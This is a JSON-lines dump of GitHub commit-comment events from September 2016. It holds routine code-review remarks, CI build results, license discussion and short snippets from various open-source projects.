{"id":"4555106877","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19000202,"position":null,"line":null,"path":null,"commit_id":"c62d87301a16e6fef4235f9d9c19296b8d8cfcc1","created_at":"2016-09-13T11:54:10Z","updated_at":"2016-09-13T11:54:10Z","body":"great thanks !"}},"created_at":"2016-09-13T11:54:10Z"}
{"id":"4555107524","type":"CommitCommentEvent","actor":{"login":"jassmith"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19000203,"position":null,"line":null,"path":null,"commit_id":"d8f939ff6eee0a8f2ecc9392cbdb898e3d140d8b","created_at":"2016-09-13T11:54:18Z","updated_at":"2016-09-13T11:54:18Z","body":"TeamCity Xamarin.Forms :: Debug :: Cycle7 :: Windows Debug [Build 1348](http://teamcity.xamarin.com/viewLog.html?buildId=130067&buildTypeId=XamarinForms_WindowsDebug) outcome was **FAILURE**\nSummary: Tests passed: 3437, ignored: 8; exit code 1 Build time: 00:10:09"}},"created_at":"2016-09-13T11:54:18Z"}
{"id":"4555110389","type":"CommitCommentEvent","actor":{"login":"jassmith"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":19000213,"position":null,"line":null,"path":null,"commit_id":"960f02d0e7549088d15b74bd11628eb987c77a74","created_at":"2016-09-13T11:54:58Z","updated_at":"2016-09-13T11:54:58Z","body":"TeamCity Xamarin.Forms :: Debug :: Cycle7 :: Windows Debug [Build 1352](http://teamcity.xamarin.com/viewLog.html?buildId=130073&buildTypeId=XamarinForms_WindowsDebug) outcome was **FAILURE**\nSummary: Compilation error: Xamarin.Forms.Platform.Android\\Xamarin.Forms.Platform.Android.csproj (new) Build time: 00:01:50"}},"created_at":"2016-09-13T11:54:58Z"}
{"id":"4555111683","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":19000216,"position":17,"line":17,"path":"lib/markdown-to-html.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T11:55:19Z","updated_at":"2016-09-13T11:55:19Z","body":"promisify imported modules:\r\n\r\n```javascript\r\nconst promisify = require('bluebird').promisify;\r\nconst fs = require('fs');\r\nconst marked = promisify(require('marked'));\r\nconst readFile = promisify(fs.readFile);\r\n\r\nfunction markdownToHtml(filename) {\r\n    return readFile(filename, 'utf8')\r\n       .then(markdown => marked(markdown))\r\n}\r\n```"}},"created_at":"2016-09-13T11:55:19Z"}
{"id":"4555114397","type":"CommitCommentEvent","actor":{"login":"napernik"},"repo":{"name":"Orckestra/C1-CMS"},"payload":{"comment":{"id":19000219,"position":106,"line":139,"path":"Composite/C1Console/Trees/GenericAddDataActionNode.cs","commit_id":"b1f70368622c89bbb4d53bdc744f12856befa46c","created_at":"2016-09-13T11:55:56Z","updated_at":"2016-09-13T11:55:56Z","body":"True. Implemented here https://github.com/Orckestra/C1-CMS/commit/1d7190c49df95173486b38534702e623cae19c6e"}},"created_at":"2016-09-13T11:55:56Z"}
{"id":"4555118790","type":"CommitCommentEvent","actor":{"login":"wutian2016"},"repo":{"name":"wutian2016/wutian2016.github.io"},"payload":{"comment":{"id":19000230,"position":null,"line":null,"path":null,"commit_id":"3e7121ead99fdaa49a22f4e86ecdd3bdc2d9d025","created_at":"2016-09-13T11:56:54Z","updated_at":"2016-09-13T11:56:54Z","body":"通过"}},"created_at":"2016-09-13T11:56:54Z"}
{"id":"4555121938","type":"CommitCommentEvent","actor":{"login":"wutian2016"},"repo":{"name":"wutian2016/wutian2016.github.io"},"payload":{"comment":{"id":19000236,"position":null,"line":null,"path":null,"commit_id":"5583d17afad2346103d6ccfafd0cf3889cfc9a97","created_at":"2016-09-13T11:57:38Z","updated_at":"2016-09-13T11:57:38Z","body":"能信g"}},"created_at":"2016-09-13T11:57:38Z"}
{"id":"4555122823","type":"CommitCommentEvent","actor":{"login":"bummzack"},"repo":{"name":"silvershop/silvershop-core"},"payload":{"comment":{"id":19000241,"position":null,"line":null,"path":null,"commit_id":"047bbdc7204556a9aa8f71de0efbc6723d75740f","created_at":"2016-09-13T11:57:50Z","updated_at":"2016-09-13T11:57:50Z","body":"@wilr Is the module you're talking about open-source? I'd be interested to have a look at it, to better understand/solve the issue at hand."}},"created_at":"2016-09-13T11:57:50Z"}
{"id":"4555123316","type":"CommitCommentEvent","actor":{"login":"babigeon"},"repo":{"name":"babigeon/ABINIT-parallel-mode-installation-on-debian-remarks"},"payload":{"comment":{"id":19000246,"position":2,"line":2,"path":"README.md","commit_id":"4a5d4933c2d84149ca926e00df863c2a0f6a7921","created_at":"2016-09-13T11:57:57Z","updated_at":"2016-09-13T11:57:57Z","body":"libraries"}},"created_at":"2016-09-13T11:57:57Z"}
{"id":"4555127240","type":"CommitCommentEvent","actor":{"login":"mlebkowski"},"repo":{"name":"syzygypl/AdwordsBannersDev"},"payload":{"comment":{"id":19000257,"position":null,"line":null,"path":null,"commit_id":"104cd189372032f280a058b905e9fa1528b3da3c","created_at":"2016-09-13T11:58:49Z","updated_at":"2016-09-13T11:58:49Z","body":"nie lepiej \"MIT\" napisać? :D"}},"created_at":"2016-09-13T11:58:49Z"}
{"id":"4555130546","type":"CommitCommentEvent","actor":{"login":"ahuarte47"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19000269,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-13T11:59:34Z","updated_at":"2016-09-13T11:59:34Z","body":"Same results, but I build succesfully with this baffling workaround...\r\n\r\n![image](https://cloud.githubusercontent.com/assets/5576272/18472809/d6d5e3c2-79b9-11e6-9be7-543aa5419630.png)\r\n"}},"created_at":"2016-09-13T11:59:34Z"}
{"id":"4555133264","type":"CommitCommentEvent","actor":{"login":"fatkudu"},"repo":{"name":"CalConnect/DEVGUIDE"},"payload":{"comment":{"id":19000275,"position":33,"line":43,"path":"Standards.md","commit_id":"7998434ad9c5f06b990e419e8100771b7476ca40","created_at":"2016-09-13T12:00:12Z","updated_at":"2016-09-13T12:00:12Z","body":"CalDaV?"}},"created_at":"2016-09-13T12:00:12Z"}
{"id":"4555133736","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19000276,"position":null,"line":null,"path":null,"commit_id":"1ed05c7d65e9e6b28153ea822995b0773fe2c3af","created_at":"2016-09-13T12:00:18Z","updated_at":"2016-09-13T12:00:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 54](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13172&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-13T12:00:18Z"}
{"id":"4555136053","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":19000279,"position":null,"line":null,"path":null,"commit_id":"259a949fa0ae810a2eb3a89daf4f2aa96e4005ec","created_at":"2016-09-13T12:00:45Z","updated_at":"2016-09-13T12:00:45Z","body":"The three main ACID branches were updated with a more elaborated script for this NPC.\r\nFor Classic: https://github.com/ACID-Scripts/Classic/commit/6d27ef20fa3527250a204a250cc8f52e8bd3bcf9"}},"created_at":"2016-09-13T12:00:45Z"}
{"id":"4555136234","type":"CommitCommentEvent","actor":{"login":"halas"},"repo":{"name":"syzygypl/AdwordsBannersDev"},"payload":{"comment":{"id":19000281,"position":null,"line":null,"path":null,"commit_id":"104cd189372032f280a058b905e9fa1528b3da3c","created_at":"2016-09-13T12:00:47Z","updated_at":"2016-09-13T12:00:47Z","body":"A jak zmienimy licencję? Znów trzeba będzie w dwóch miejscach szukać :)"}},"created_at":"2016-09-13T12:00:47Z"}
{"id":"4555137667","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":19000284,"position":31,"line":31,"path":"lib/render-html.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T12:01:09Z","updated_at":"2016-09-13T12:01:09Z","body":"simplify: \r\n```javascript\r\nfunction renderHtml(data) {\r\n  return new Promise((resolve, reject) => {\r\n    env.render(filename, data, (err, html) => {\r\n       err ? reject(err) : resolve(html);\r\n    });\r\n  });\r\n}\r\n```"}},"created_at":"2016-09-13T12:01:09Z"}
{"id":"4555138826","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"sveroude/dvh-page-formatter"},"payload":{"comment":{"id":19000287,"position":31,"line":31,"path":"lib/render-html.js","commit_id":"38d1ff26e2b2c80efc7c25e17eb0e2921a6af55f","created_at":"2016-09-13T12:01:24Z","updated_at":"2016-09-13T12:01:24Z","body":"consider disabling caching: https://github.com/jbmoelker/jinja-compat-tests/blob/master/test-nunjucks.js#L12"}},"created_at":"2016-09-13T12:01:24Z"}
{"id":"4555139650","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19000289,"position":null,"line":null,"path":null,"commit_id":"1ed05c7d65e9e6b28153ea822995b0773fe2c3af","created_at":"2016-09-13T12:01:35Z","updated_at":"2016-09-13T12:01:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 54](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13172&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:17"}},"created_at":"2016-09-13T12:01:35Z"}
{"id":"4555141780","type":"CommitCommentEvent","actor":{"login":"dipak-pawar"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":19000292,"position":43,"line":43,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/impl/reporter/JiraGovernorRecorder.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T12:02:04Z","updated_at":"2016-09-13T12:02:04Z","body":"@lordofthejars, you are right, isAnnotationPresent checks in current class.\r\nclass A{method foo}\r\nclass B extends A{method bar}\r\n\r\nIf we run Class A as test then it will check for foo method & execute it. It won't check subclass B. then Is there need to check subclass annotation?\r\n"}},"created_at":"2016-09-13T12:02:04Z"}
{"id":"4555144573","type":"CommitCommentEvent","actor":{"login":"Heufneutje"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19000297,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T12:02:40Z","updated_at":"2016-09-13T12:02:40Z","body":"@k1tt3hk4t \r\n> Created with consent and permission of King Lemming and Team CoFH."}},"created_at":"2016-09-13T12:02:40Z"}
{"id":"4555145633","type":"CommitCommentEvent","actor":{"login":"iamprabhat"},"repo":{"name":"iamprabhat/iamprabhat.github.io"},"payload":{"comment":{"id":19000298,"position":null,"line":null,"path":null,"commit_id":"092ef0f12637a4bae4aecb7fb6d17bfa207351e3","created_at":"2016-09-13T12:02:53Z","updated_at":"2016-09-13T12:02:53Z","body":"If We're setting:\r\n_1. \"$normalize-vertical-rhythm: false !default;\"_\r\n`Output:`\r\n```\r\n/*\r\n * 1. Change the default font family in all browsers (opinionated).\r\n * 2. Prevent adjustments of font size after orientation changes in IE and iOS.\r\n */\r\n```\r\n```\r\nhtml {\r\n  font-family: sans-serif;\r\n  /* 1 */\r\n  -ms-text-size-adjust: 100%;\r\n  /* 2 */\r\n  -webkit-text-size-adjust: 100%;\r\n  /* 2 */\r\n}\r\n```\r\n_2. \"$normalize-vertical-rhythm: true !default;\"_\r\n`Output:`\r\n```\r\n/*\r\n * 1. Change the default font family in all browsers (opinionated).\r\n * 2. Prevent adjustments of font size after orientation changes in IE and iOS.\r\n */\r\n```\r\n```\r\nhtml {\r\n  font-size: 100%;\r\n  line-height: 1.5em;\r\n  font-family: sans-serif;\r\n  /* 1 */\r\n  -ms-text-size-adjust: 100%;\r\n  /* 2 */\r\n  -webkit-text-size-adjust: 100%;\r\n  /* 2 */\r\n}\r\n```"}},"created_at":"2016-09-13T12:02:53Z"}
{"id":"4555148813","type":"CommitCommentEvent","actor":{"login":"h3wn"},"repo":{"name":"h3wn/h3wn_bot"},"payload":{"comment":{"id":19000307,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-13T12:03:35Z","updated_at":"2016-09-13T12:03:35Z","body":"212451434"}},"created_at":"2016-09-13T12:03:35Z"}
{"id":"4555150079","type":"CommitCommentEvent","actor":{"login":"DarkGuardsman"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19000311,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T12:03:51Z","updated_at":"2016-09-13T12:03:51Z","body":"@LexManos Not all energy systems work this way, I actually had a system at one point in time that worked like redstone. Where you either had enough force to make everything work, or everything didn't work. At no point was there any battery storage of energy. \r\n\r\nThat being said this is a rather nice system and I'm loving the capability system as well. Thanks to your example I now have my question answers \"How to prevent connections of different power systems\". I say regardless of what people say, keep up the good work. This was needed so long ago in order to provide a simple solution to a complex problem. One that I've been working on solving with the Universal Energy system for the past 3 years. Using complex handlers, managers, and even ASM injected interfaces. With a common system, I may one day be able to reduce my code base and spend more time on other projects. Maybe even helping you guys out with forge like I've said I would do in the past :)"}},"created_at":"2016-09-13T12:03:51Z"}
{"id":"4555152759","type":"CommitCommentEvent","actor":{"login":"iamprabhat"},"repo":{"name":"iamprabhat/iamprabhat.github.io"},"payload":{"comment":{"id":19000317,"position":null,"line":null,"path":null,"commit_id":"092ef0f12637a4bae4aecb7fb6d17bfa207351e3","created_at":"2016-09-13T12:04:20Z","updated_at":"2016-09-13T12:04:20Z","body":"If We're setting:\r\n_1. \"$normalize-vertical-rhythm: false !default;\"_\r\n`Output:`\r\n```\r\n/*\r\n * 1. Change the default font family in all browsers (opinionated).\r\n * 2. Prevent adjustments of font size after orientation changes in IE and iOS.\r\n */\r\n```\r\n```\r\nhtml {\r\n  font-family: sans-serif;\r\n  /* 1 */\r\n  -ms-text-size-adjust: 100%;\r\n  /* 2 */\r\n  -webkit-text-size-adjust: 100%;\r\n  /* 2 */\r\n}\r\n```\r\n_2. \"$normalize-vertical-rhythm: true !default;\"_\r\n`Output:`\r\n```\r\n/*\r\n * 1. Change the default font family in all browsers (opinionated).\r\n * 2. Prevent adjustments of font size after orientation changes in IE and iOS.\r\n */\r\n```\r\n```\r\nhtml {\r\n  font-size: 100%;\r\n  line-height: 1.5em;\r\n  font-family: sans-serif;\r\n  /* 1 */\r\n  -ms-text-size-adjust: 100%;\r\n  /* 2 */\r\n  -webkit-text-size-adjust: 100%;\r\n  /* 2 */\r\n}\r\n```"}},"created_at":"2016-09-13T12:04:20Z"}
{"id":"4555158483","type":"CommitCommentEvent","actor":{"login":"iamprabhat"},"repo":{"name":"iamprabhat/iamprabhat.github.io"},"payload":{"comment":{"id":19000332,"position":null,"line":null,"path":null,"commit_id":"092ef0f12637a4bae4aecb7fb6d17bfa207351e3","created_at":"2016-09-13T12:05:39Z","updated_at":"2016-09-13T12:05:39Z","body":"If We're setting:\r\n_1. \"$normalize-vertical-rhythm: false !default;\"_\r\n`Output:`\r\n```\r\n/*\r\n * 1. Change the default font family in all browsers (opinionated).\r\n * 2. Prevent adjustments of font size after orientation changes in IE and iOS.\r\n */\r\n```\r\n```\r\nhtml {\r\n  font-family: sans-serif;\r\n  /* 1 */\r\n  -ms-text-size-adjust: 100%;\r\n  /* 2 */\r\n  -webkit-text-size-adjust: 100%;\r\n  /* 2 */\r\n}\r\n```\r\n_2. \"$normalize-vertical-rhythm: true !default;\"_\r\n`Output:`\r\n```\r\n/*\r\n * 1. Change the default font family in all browsers (opinionated).\r\n * 2. Prevent adjustments of font size after orientation changes in IE and iOS.\r\n */\r\n```\r\n```\r\nhtml {\r\n  font-size: 100%;\r\n  line-height: 1.5em;\r\n  font-family: sans-serif;\r\n  /* 1 */\r\n  -ms-text-size-adjust: 100%;\r\n  /* 2 */\r\n  -webkit-text-size-adjust: 100%;\r\n  /* 2 */\r\n}\r\n```"}},"created_at":"2016-09-13T12:05:39Z"}
{"id":"4555163369","type":"CommitCommentEvent","actor":{"login":"andrzejdus"},"repo":{"name":"syzygypl/AdwordsBannersDev"},"payload":{"comment":{"id":19000350,"position":null,"line":null,"path":null,"commit_id":"104cd189372032f280a058b905e9fa1528b3da3c","created_at":"2016-09-13T12:06:48Z","updated_at":"2016-09-13T12:06:48Z","body":"IMHO jesli licencja jest na liscie SPDX to powinna tam być wpisana\r\nhttps://docs.npmjs.com/files/package.json#license"}},"created_at":"2016-09-13T12:06:48Z"}
{"id":"4555164093","type":"CommitCommentEvent","actor":{"login":"mfenner"},"repo":{"name":"crosscite/doi-metadata-search"},"payload":{"comment":{"id":19000352,"position":null,"line":null,"path":null,"commit_id":"683ae2fc2fb26abb102c03ed94cd5d7599497e13","created_at":"2016-09-13T12:06:58Z","updated_at":"2016-09-13T12:06:58Z","body":"Good point. I think in decreasing order of preference:\r\n1. CDN\r\n2. npm module or bower component\r\n3. custom javascript\r\n\r\nA variant is the DataCite assets host which has one javascript with custom code used in several sites. "}},"created_at":"2016-09-13T12:06:58Z"}
{"id":"4555172125","type":"CommitCommentEvent","actor":{"login":"halas"},"repo":{"name":"syzygypl/AdwordsBannersDev"},"payload":{"comment":{"id":19000373,"position":null,"line":null,"path":null,"commit_id":"104cd189372032f280a058b905e9fa1528b3da3c","created_at":"2016-09-13T12:08:46Z","updated_at":"2016-09-13T12:08:46Z","body":"Prawda, też wziąłem to rozwiązanie z tej dokumentacji, ale dopiero teraz przeczytałem to, co między linijkami kodu :/"}},"created_at":"2016-09-13T12:08:46Z"}
{"id":"4555182738","type":"CommitCommentEvent","actor":{"login":"p4x3c0"},"repo":{"name":"p4x3c0/PedalPi-Display-View"},"payload":{"comment":{"id":19000397,"position":null,"line":null,"path":null,"commit_id":"8a48a14553c341dce9068652f3b11466a5259e14","created_at":"2016-09-13T12:11:03Z","updated_at":"2016-09-13T12:11:03Z","body":"Todas telas feitas estaticamente, sem leitura do Json."}},"created_at":"2016-09-13T12:11:03Z"}
{"id":"4555182811","type":"CommitCommentEvent","actor":{"login":"nilzao"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":19000398,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-13T12:11:05Z","updated_at":"2016-09-13T12:11:05Z","body":"branch master of this repo is the race server, and branch freeroam is an example of freeroam protocol.\r\n\r\nthis code here where we talking, is just a commit of renaming classes.\r\n\r\nbranch master:\r\nhttps://github.com/nilzao/soapbox-race-udp/tree/master\r\n\r\nbranch freeroam:\r\nhttps://github.com/nilzao/soapbox-race-udp/tree/freeroam"}},"created_at":"2016-09-13T12:11:05Z"}
{"id":"4555187281","type":"CommitCommentEvent","actor":{"login":"pillehu"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19000407,"position":null,"line":null,"path":null,"commit_id":"cc3a8b396324209d60f78eddc6c07c74065a9665","created_at":"2016-09-13T12:12:02Z","updated_at":"2016-09-13T12:12:02Z","body":"How can I make the accessible theme (for screen reader - w3c-wcag)?"}},"created_at":"2016-09-13T12:12:02Z"}
{"id":"4555188059","type":"CommitCommentEvent","actor":{"login":"petrus-v"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19000410,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T12:12:13Z","updated_at":"2016-09-13T12:12:13Z","body":"@codingforfun if you want more information can you read #467? in fact this commit was about to make unit test running. this was already failing before this commit but not shown by travis."}},"created_at":"2016-09-13T12:12:13Z"}
{"id":"4555188760","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19000414,"position":5,"line":193,"path":"src/Mono.Android/Xamarin.Android.Net/AndroidClientHandler.cs","commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-13T12:12:21Z","updated_at":"2016-09-13T12:12:21Z","body":"This breaks since Uri.ToString() removes any hex escaped characters in the Uri. For example, try to use this code with a querystring parameter containing an ampersand (& or %26). Instead of `Uri.EscapeUriString(redirectState.NewUrl.ToString())`use `redirectState.NewUrl.OriginalString` and keep the caller responsible for proper URL encoding.\r\n\r\nTo observe the faulty behaviour. use this URL as input: `new Uri(\"http://example.com/?query=anna%20%26%20lotte&param2=true\")`"}},"created_at":"2016-09-13T12:12:21Z"}
{"id":"4555192994","type":"CommitCommentEvent","actor":{"login":"Vincent030299"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":19000426,"position":null,"line":null,"path":null,"commit_id":"3d737848e1e9b20c4c022718cc5c0647d0f524fe","created_at":"2016-09-13T12:13:17Z","updated_at":"2016-09-13T12:13:17Z","body":"Awesome guides!!"}},"created_at":"2016-09-13T12:13:17Z"}
{"id":"4555194791","type":"CommitCommentEvent","actor":{"login":"martinwiboe"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19000431,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-13T12:13:39Z","updated_at":"2016-09-13T12:13:39Z","body":"@grendello Requesting that issue https://bugzilla.xamarin.com/show_bug.cgi?id=43411 be reopened."}},"created_at":"2016-09-13T12:13:39Z"}
{"id":"4555200269","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":19000444,"position":null,"line":null,"path":null,"commit_id":"a63cf9a7825986e2d4484b93508fd08aac1fd20d","created_at":"2016-09-13T12:14:52Z","updated_at":"2016-09-13T12:14:52Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vFPfq9hS&#x2F;18-todos\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> todos</a>"}},"created_at":"2016-09-13T12:14:52Z"}
{"id":"4555200642","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":19000446,"position":null,"line":null,"path":null,"commit_id":"b3f57382382565b8ba8dfe8da3f2729b04a8ebbb","created_at":"2016-09-13T12:14:57Z","updated_at":"2016-09-13T12:14:57Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vFPfq9hS&#x2F;18-todos\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> todos</a>"}},"created_at":"2016-09-13T12:14:57Z"}
{"id":"4555205730","type":"CommitCommentEvent","actor":{"login":"joeMJ"},"repo":{"name":"nextcloud/server"},"payload":{"comment":{"id":19000451,"position":null,"line":null,"path":null,"commit_id":"6c365cb06d1aff8d44758be1337ba30acdcc49d7","created_at":"2016-09-13T12:16:06Z","updated_at":"2016-09-13T12:16:06Z","body":"Flawless. Thank you!"}},"created_at":"2016-09-13T12:16:06Z"}
{"id":"4555210563","type":"CommitCommentEvent","actor":{"login":"YANGDANDANDAN"},"repo":{"name":"owncloud/android"},"payload":{"comment":{"id":19000456,"position":10,"line":92,"path":"src/com/owncloud/android/db/PreferenceManager.java","commit_id":"72232706c32e52bc04684bcf2f31530cb7e9a48b","created_at":"2016-09-13T12:17:10Z","updated_at":"2016-09-13T12:17:10Z","body":"ll"}},"created_at":"2016-09-13T12:17:10Z"}
{"id":"4555211859","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19000458,"position":1,"line":1,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"3204a3570995a370cfb25ffeec7ad69ccb0cbdc3","created_at":"2016-09-13T12:17:27Z","updated_at":"2016-09-13T12:17:27Z","body":"you have changed the line endings -- because you cloned it on linux. you need it it to put on windows, as you have to run the tests and make sure they pass"}},"created_at":"2016-09-13T12:17:27Z"}
{"id":"4555213314","type":"CommitCommentEvent","actor":{"login":"Dominator008"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19000462,"position":null,"line":null,"path":null,"commit_id":"229d49fa2dc9243f03a8b13b2a285d229eade5f6","created_at":"2016-09-13T12:17:45Z","updated_at":"2016-09-13T12:17:45Z","body":"@phistuck Technically you are correct and `resources.json` shouldn't be included, but since we generate it with Node and we want to simplify the open source build process, it is included."}},"created_at":"2016-09-13T12:17:45Z"}
{"id":"4555221439","type":"CommitCommentEvent","actor":{"login":"oscar-ol"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19000478,"position":null,"line":null,"path":null,"commit_id":"5253f0b3bd06f3a1e3cc776e6dd90116a5a108e4","created_at":"2016-09-13T12:19:31Z","updated_at":"2016-09-13T12:19:31Z","body":"Tested in a clean installation with Security C., cake bake, delete postLink blackholed.  \r\ndebug($url);\r\narray(\r\n\t'action' => 'delete',\r\n\t(int) 0 => '2'\r\n)\r\ndebug($formUrl);\r\n'/test/tests/delete/2'"}},"created_at":"2016-09-13T12:19:31Z"}
{"id":"4555222586","type":"CommitCommentEvent","actor":{"login":"Vezzra"},"repo":{"name":"freeorion/freeorion"},"payload":{"comment":{"id":19000480,"position":null,"line":null,"path":null,"commit_id":"90e4768b91eb2275fac8075821109f72c7eaa4e0","created_at":"2016-09-13T12:19:46Z","updated_at":"2016-09-13T12:19:46Z","body":"Done: 4057b61ce2cc5aa09b4ac9cac0b2d6ae9637d445"}},"created_at":"2016-09-13T12:19:46Z"}
{"id":"4555226052","type":"CommitCommentEvent","actor":{"login":"Vezzra"},"repo":{"name":"freeorion/freeorion"},"payload":{"comment":{"id":19000488,"position":null,"line":null,"path":null,"commit_id":"6875fd238a375618d6f32d63b6501ef8500a641a","created_at":"2016-09-13T12:20:32Z","updated_at":"2016-09-13T12:20:32Z","body":"Done: 98c79e784d3844b322b34347f4e2881b5825c86b"}},"created_at":"2016-09-13T12:20:32Z"}
{"id":"4555230355","type":"CommitCommentEvent","actor":{"login":"hypersw"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":19000501,"position":null,"line":null,"path":null,"commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-13T12:21:29Z","updated_at":"2016-09-13T12:21:29Z","body":"I've made all the utility code internal, so that it wouldn't show up in your solution and cause ambiguity in code completion etc.\r\nAs the cmdline formatter is useful in clients as well, I'd rather make it back public and make the name a bit more unique maybe."}},"created_at":"2016-09-13T12:21:29Z"}
{"id":"4555231195","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19000505,"position":null,"line":null,"path":null,"commit_id":"25e0c5f6572601d814c043842472ffb001e94210","created_at":"2016-09-13T12:21:40Z","updated_at":"2016-09-13T12:21:40Z","body":"Actually, GuardianEvade is not an evade functionality, but rather a helper function because I can't do the lookup directly in GuardianAI; https://github.com/Phatcat/mangos-wotlk/commit/25e0c5f6572601d814c043842472ffb001e94210#diff-b1318d9ecce2e0c12047a2d2c24da46cR6113\r\n\r\nBut, as I said, this commit is till early works ^^"}},"created_at":"2016-09-13T12:21:40Z"}
{"id":"4555242478","type":"CommitCommentEvent","actor":{"login":"Arrray"},"repo":{"name":"Arrray/JavaScript-DOM"},"payload":{"comment":{"id":19000536,"position":1,"line":1,"path":"README.md","commit_id":"8639e8d5d504932052ce39f9083df4823193fbf6","created_at":"2016-09-13T12:24:12Z","updated_at":"2016-09-13T12:24:12Z","body":"本章内容\r\n1、理解事件流\r\n2、使用事件处理程序\r\n3、不同的事件类型\r\n一、事件流\r\n事件流描述的是从页面中接受事件的顺序。\r\nIE的事件流是事件冒泡流，而Netscape的事件流是事件捕获流\r\n1、事件冒泡\r\n事件冒泡，即事件最开始由最具体的元素(文档中嵌套层次最深的那个节点)接收，然后逐级向上转播至最不具体的节点(文档)。\r\n2、事件捕获\r\n事件捕获的思想是不太具体的节点应该更早接收到事件，而最具体的节点最后接收到事件。\r\n二、事件处理程序\r\n1、HTML事件处理程序\r\n2、DOM0级事件处理程序\r\n3、DOM2级事件处理程序\r\nDOM2级事件定义了两个方法：用于处理指定和删除事件处理程序的操作：addEventListener()和removeEventListener()。它们都接收三个参数：要处理的事件名、作为事件处理程序的函数和一个布尔值。\r\n4、IE事件处理程序\r\nattachEvent()添加事件\r\ndetachEvent()删除事件\r\n这两个方法接收相同的两个参数：事件处理程序名称与事件处理函数\r\n5、跨浏览器的事件处理程序\r\n三、事件对象\r\n事件对象event\r\n1、DOM中的事件对象\r\n(1)、type:获取事件类型\r\n(2)、target：事件目标\r\n(3)、stopPropagation() 阻止事件冒泡\r\n(4)、preventDefault() 阻止事件的默认行为\r\n2、IE中的事件对象\r\n(1)、type:获取事件类型\r\n(2)、srcElement：事件目标\r\n(3)、cancelBubble=true阻止事件冒泡\r\n(4)、returnValue=false阻止事件的默认行为\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-13T12:24:12Z"}
